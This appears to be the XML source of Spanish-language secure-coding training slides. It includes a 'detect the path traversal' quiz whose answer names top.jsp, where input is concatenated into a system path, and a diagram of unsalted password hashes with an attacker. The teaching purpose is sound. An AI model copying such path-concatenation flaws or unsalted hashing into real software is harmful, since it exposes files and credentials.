              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692576" y="1703996"/>
              <a:ext cx="9144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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A9C97B-416C-DF42-BC88-6DCF2553C406}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692576" y="3125162"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71D99E3-3E5F-E242-B445-C342CC0BEF39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692576" y="4419599"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Curved Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6614FFBE-EF57-874F-B1F5-5539571C7575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12" idx="1"/>
              <a:endCxn id="6" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="2975290" y="1187833"/>
              <a:ext cx="775182" cy="3367297"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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riangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02ACF99F-393C-7443-9EF3-1688C5DB6A23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="825591" y="3125162"/>
              <a:ext cx="1060704" cy="914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gular Pentagon 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68597209-E935-B747-A9A2-488D0F684238}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="875883" y="4523774"/>
              <a:ext cx="960120" cy="914400"/>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urved Connector 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5341158E-367A-8449-AC1F-67CBF87BE7CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="1"/>
              <a:endCxn id="6" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1813144" y="2160602"/>
              <a:ext cx="879433" cy="594"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="539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25B974C6-3FCF-0A49-A8B2-2901BBE801D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="14" idx="1"/>
              <a:endCxn id="25" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1621120" y="3582362"/>
              <a:ext cx="1071457" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="539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7FB612D5-486F-AC47-B851-E662CAC0B864}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15" idx="1"/>
              <a:endCxn id="26" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1836002" y="4873043"/>
              <a:ext cx="856574" cy="3756"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="539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Multiply 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34643B39-5E7B-6A4E-ADA4-308CC9CC2709}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3689235" y="2472313"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="mathMultiply">
              <a:avLst>
                <a:gd name="adj1" fmla="val 133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urved Connector 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DC2E18-F34C-2D48-AB0B-D9923E3426CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12" idx="0"/>
              <a:endCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="4006414" y="1761758"/>
              <a:ext cx="963966" cy="1762842"/>
            </a:xfrm>
            <a:prstGeom prst="curved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133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B74973-79DF-714C-909D-0723420CF39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613459" y="3646026"/>
            <a:ext cx="8506790"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UY" sz="7200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Juguemos a:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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s-UY" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>¡DETECTAR EL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PATH TRAVERSAL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</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UY" sz="4400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64362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972629-D8E7-D74B-BC34-3B00466BB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2498"/>
            <a:ext cx="12192000" cy="6693003"/>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1322555"/>
            <a:ext cx="12192000" cy="279024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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4645571"/>
            <a:ext cx="12192000" cy="280102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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33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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0" err="1"/>
              <a:t>top.jsp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(La entrada es concatenada a un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> del sistema permitiendo su manipulación)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2780359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C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119745" y="47556"/>
            <a:ext cx="10515600" cy="1028905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Hashes sin sal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="948004" y="1789774"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948004" y="2595525"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</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4529253"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887652" y="5450623"/>
            <a:ext cx="801823" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Usuario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Curved Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="532252" y="3747055"/>
            <a:ext cx="1564396" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">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6B146178-72F2-974B-BB4F-8808455E4F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666461" y="2226193"/>
            <a:ext cx="1638144" cy="842889"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48853"/>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Oval Callout 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75853034-607F-5A46-AF53-671BEBDC74EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584917" y="4013925"/>
            <a:ext cx="2546770" cy="853384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="77000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ABCDEFG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Can 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E31EB4-DA07-574F-AF8A-4C27D3735E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016871" y="1554057"/>
            <a:ext cx="2968668" cy="2304908"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="67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793290B-35DE-2740-87F9-3E1EBBF4BEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937671" y="1659775"/>
            <a:ext cx="1058175" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Table 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2B7407-F54F-8E4E-B55C-FA39C397CFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2646852498"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306922" y="2371044"/>
          <a:ext cx="2423786" cy="1280160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="576195">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="839244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008347">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>passhash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1283997765"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5163</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2642470997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5164</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>eve</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E9A92A2…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5165</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3311727319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29526945-CCB0-3041-B7E9-1015ACB53B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54792" y="4529253"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA615CE2-F4DC-6A4C-9BC9-8B65BB21197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442590" y="5453449"/>
            <a:ext cx="891591" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Atacante</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
